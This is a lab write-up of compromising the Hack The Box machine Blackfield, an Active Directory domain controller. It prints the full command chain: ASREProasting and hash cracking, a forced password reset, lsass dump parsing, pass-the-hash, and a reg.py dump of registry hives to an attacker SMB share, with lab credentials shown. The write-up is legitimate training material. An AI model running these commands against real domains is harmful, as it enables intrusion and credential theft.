To simplify our hacking journey, I highly recommend using Exegol. If you don’t know Exegol, it’s a hacking environment like Kali Linux, with a lot of powerful tools already installed.
The best features of Exegol, in my opinion, are:
- Powerful history & autocompletion for command lines, with the parameters already filled in for you; you just need to replace the values.
- Environment segmentation per pentest engagement
- Some pull requests merged ahead of upstream (Impacket)
- The latest releases of tools (BloodHound v4)
- And some more.
Are you excited about Exegol? Just follow the instructions on the GitHub repository. I highly recommend installing the full version (this can take a while and needs about 25 GB of disk). Now that you have installed Exegol, we are ready to go.
Reconnaissance
Let’s run a quick nmap recon.
nmap -sS -v -Pn -T5 10.10.10.192
Based on the open ports, we can assume we are facing a domain controller. (Note that -sS needs root, and -T5 is the most aggressive timing template: fine against a lab box, but it can drop ports on a slow or filtered link.)
Let’s continue with enum4linux.
enum4linux-ng -A 10.10.10.192
This is a lot of information. First, let’s configure our /etc/resolv.conf with the DNS information we got, so that names in the domain resolve.
Second, enum4linux tells us that a guest session works on SMB (line 55). It also reports that a null session works (line 53), but that is a false positive (cf. the STATUS_ACCESS_DENIED returned every time it tries to dump anything over SMB).
Let’s try a guest session on SMB using smbmap (you can put whatever you want as the guest session username; any non-existent account is treated as guest).
smbmap -H 10.10.10.192 -u 'wlayzz'
Interesting, we have some uncommon shares: forensic and profiles$. We only have access to profiles$, so let’s dive in with smbclient.
smbclient.py BLACKFIELD/wlayzz@10.10.10.192 -no-pass
It looks like the folders are named after users of the domain. I found nothing interesting inside them, but with all these usernames we can try an ASREProast attack (learn more on thehacker.recipes).
ASREProast
To perform this technique, we need a file with one username per line. Just copy-paste the console output and massage it with a couple of shell commands: rev reverses each line, and awk '{print $1}' keeps the first column, so rev | awk '{print $1}' | rev keeps the last column of the listing, where the folder names are.
Now with our list of users, let’s do the attack.
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users -dc-ip 10.10.10.192 BLACKFIELD.local/
In the output file ASREProastables.txt, the script found the account support together with its AS-REP hash. This is possible because Kerberos pre-authentication is not required for this user: the KDC hands an AS-REP encrypted with the user’s key to anyone who asks for it, and that blob can then be cracked offline.
Moving now with hashcat to try cracking this hash.
hashcat --status --hash-type 18200 --attack-mode 0 ASREProastables.txt /usr/share/wordlists/rockyou.txt
Now, let’s immediately check whether the cracked password for support is valid, using the LDAP module of CrackMapExec.
cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' --kdcHost 10.10.10.192
I think it’s time to get an overview of the relationships in Active Directory using BloodHound.
BloodHound
Before we start, we need to run the neo4j database.
Then run the BloodHound collector script.
You should now have some JSON files in your working directory. Next we have to import them into the neo4j database.
Due to a bug in BloodHound v4 we need to import the files manually through the interface. Run bloodhound to open the interface, then click Upload Data on the right (red box on the screenshot below).
First, we mark the user support as owned. Search for the user in the top input box.
Now let’s see the next hop we can make with this user. Open the menu on the left of the search input, go to the Analysis tab, then Custom Queries, then the Tigers love pepper section, and click Next steps from owned users.
The first thing we see is that support has the ForceChangePassword right on the audit2020 account.
ForceChangePassword
Since the support account has the ForceChangePassword right on audit2020, we can reset that account’s password. (On a real engagement this is intrusive: the old password cannot be restored, so agree on it with the client first.)
net rpc password 'audit2020' '123Soleil!' -U 'BLACKFIELD'/'support'%'#00^BlackKnight' -S 'dc01.blackfield.local'
Now don’t forget to mark the user as owned in BloodHound and check whether we can jump to another target.
No jump possible, so let’s go back to the SMB shares and check audit2020’s rights.
smbmap -H 10.10.10.192 -u 'audit2020' -p '123Soleil!'
We have read rights on forensic, so let’s dive into this share.
smbclient.py 'BLACKFIELD'/'audit2020':'123Soleil!'@10.10.10.192
lsass.zip looks interesting; download it with get lsass.zip.
It seems someone dumped the lsass process (learn more on thehacker.recipes). There we learn that a ProcDump was probably used, and we also find a pypykatz command to parse our lsass.DMP file (unzip the archive first, and mind the case of the extracted file name on Linux).
pypykatz lsa minidump lsass.dmp
We retrieve three accounts with their NT hashes:
- svc_backup 9658d1d1dcd9250115e2205d9f48400d
- DC01$ b624dc83a27cc29da11d9bf25efea796
- Administrator 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Pass the hash
We need to verify whether these accounts still work, using the pass-the-hash technique.
cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' --kdcHost 10.10.10.192
Only the svc_backup account can authenticate, and cme flags this account as possibly an admin.
Let’s check the SMB share rights. smbmap expects the hash as LM:NT; the LM half is not used for NTLMv2 authentication, so repeating the NT hash there is harmless.
smbmap -H 10.10.10.192 -u 'svc_backup' -p '9658d1d1dcd9250115e2205d9f48400d:9658d1d1dcd9250115e2205d9f48400d'
We can read C$; maybe our first flag is here. Let’s get in with smbclient.
smbclient.py -hashes :9658d1d1dcd9250115e2205d9f48400d 'BLACKFIELD'/'svc_backup'@10.10.10.192
Now let’s root this box ! 😈
Mark this account as owned in BloodHound and check the jumps.
Backup Operators
We can see that svc_backup is a member of Backup Operators. Looking at the hacker recipes, this seems juicy.
Thanks to Shutdown’s recent pull request, we can run the attack from Linux with Impacket by dumping the registry hives directly from the domain controller. Backup Operators hold SeBackupPrivilege, which lets them read any file regardless of its ACL, the SAM, SECURITY and SYSTEM hives included; the secrets extracted from those hives include the DC machine account, which is allowed to replicate the directory, and that leads to DCSync.
To perform this attack, run an SMB server in a first terminal.
smbserver.py -smb2support WLAYZZ .
Then, in a second terminal, run the Impacket script with your IP and the name of your SMB share.
reg.py -hashes :9658d1d1dcd9250115e2205d9f48400d 'BLACKFIELD.local/svc_backup@10.10.10.192' backup -o '\\10.10.16.2\WLAYZZ'
Dumping the hives can take a moment; time for a coffee. ☕
Now that we have the backup hives, we can run secretsdump on them.
For an unexplained reason, pass the hash doesn’t work with the Administrator account, but we got its password in clear text.
cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'Administrator' -p '###_ADM1N_3920_###' --kdcHost 10.10.10.192
Last move to get the root flag? Let’s see.
smbclient.py 'BLACKFIELD'/'Administrator':'###_ADM1N_3920_###'@10.10.10.192
We did it. 🎉 🥳
I hope you liked this box as much as I did.
I want to thank Shutdown for his work on the hacker recipes, Exegol and Impacket. 💪
Also thanks to Euz and the Hack the box France community. 🤟
Find me on Twitter: Wlayzz. Happy hacking 🏴☠️
Some memes about Exegol